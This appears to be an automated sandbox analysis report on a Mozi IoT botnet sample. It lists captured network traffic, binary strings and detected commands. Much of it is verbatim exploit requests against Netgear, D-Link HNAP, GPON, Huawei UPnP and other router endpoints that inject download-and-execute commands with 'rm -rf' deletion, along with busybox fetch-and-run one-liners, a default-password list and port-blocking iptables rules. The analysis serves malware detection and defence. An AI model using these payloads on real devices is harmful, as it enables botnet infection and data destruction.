                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 66.221.91.189:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 172.82.182.74:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 182.254.240.127:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 168.226.35.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.164.6.45:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 65.110.89.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.132.44.102:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 01 May 2021 15:49:20 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.m
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.m;
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.m;$
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/bin.sh
                Source: KnAY2OIPI3String found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: KnAY2OIPI3String found in binary or memory: http://127.0.0.1
                Source: KnAY2OIPI3String found in binary or memory: http://127.0.0.1sendcmd
                Source: KnAY2OIPI3String found in binary or memory: http://HTTP/1.1
                Source: KnAY2OIPI3String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: KnAY2OIPI3String found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: KnAY2OIPI3String found in binary or memory: http://purenetworks.com/HNAP1/
                Source: KnAY2OIPI3String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: KnAY2OIPI3String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: KnAY2OIPI3String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php
                Source: /tmp/KnAY2OIPI3 (PID: 4596)HTML file containing JavaScript created: /usr/networksJump to dropped file
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                Source: Initial sampleString containing potential weak password found: admin
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: 123456
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: 12345
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial samplePotential command found: POST /cdn-cgi/
                Source: Initial samplePotential command found: GET /c HTTP/1.0
                Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
                Source: Initial samplePotential command found: GET %s HTTP/1.1
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: KnAY2OIPI3, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4635)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4668)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4671)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4707)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
                Source: /bin/sh (PID: 4733)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4754)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4776)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
                Source: /bin/sh (PID: 4811)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
